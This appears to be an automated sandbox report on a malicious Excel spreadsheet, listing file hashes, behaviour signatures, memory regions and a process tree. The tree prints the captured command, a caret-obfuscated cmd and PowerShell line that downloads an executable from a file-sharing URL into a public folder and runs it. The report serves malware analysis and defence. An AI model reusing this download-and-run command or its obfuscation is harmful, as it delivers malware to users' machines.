Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2023 15:58

General

  • Target

    Zapitvane_MACH_BULGARIA_EOOD_09_2023.xls

  • Size

    100KB

  • MD5

    55e0c24ad93d53e9a161d813f09d9e9a

  • SHA1

    e3b6b703b99801b32a4c9754d591383dc30432bb

  • SHA256

    c1f218a24f82946584e59d64abc9762e85614803fe82c432d21678d1ae000db5

  • SHA512

    55127c6cbb0a7120f86378feb4057ccfc5341b22f902fffd14121cde404002de6422ebc5b346ae8ea8967d458d4581c68f7ae97d6b0ff85ad10d38aa38071375

  • SSDEEP

    3072:QrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnADtJE2zuxq+fr9wBLa71ba2ryLTHeYR:2xEtjPOtioVjDGUU1qfDlavx+W2QnApF

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Zapitvane_MACH_BULGARIA_EOOD_09_2023.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/YeTYSYp0DR/abe.e^xe -o C:\Users\Public\gg1c8.exe;C:\Users\Public\gg1c8.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/YeTYSYp0DR/abe.exe -o C:\Users\Public\gg1c8.exe;C:\Users\Public\gg1c8.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2740

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2204-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2204-1-0x0000000072BCD000-0x0000000072BD8000-memory.dmp
    Filesize

    44KB

  • memory/2204-4-0x0000000006010000-0x0000000006110000-memory.dmp
    Filesize

    1024KB

  • memory/2204-12-0x0000000072BCD000-0x0000000072BD8000-memory.dmp
    Filesize

    44KB

  • memory/2204-13-0x0000000006010000-0x0000000006110000-memory.dmp
    Filesize

    1024KB

  • memory/2204-14-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2204-15-0x0000000072BCD000-0x0000000072BD8000-memory.dmp
    Filesize

    44KB

  • memory/2740-7-0x000000006C550000-0x000000006CAFB000-memory.dmp
    Filesize

    5.7MB

  • memory/2740-9-0x00000000026E0000-0x0000000002720000-memory.dmp
    Filesize

    256KB

  • memory/2740-8-0x000000006C550000-0x000000006CAFB000-memory.dmp
    Filesize

    5.7MB

  • memory/2740-10-0x00000000026E0000-0x0000000002720000-memory.dmp
    Filesize

    256KB

  • memory/2740-11-0x000000006C550000-0x000000006CAFB000-memory.dmp
    Filesize

    5.7MB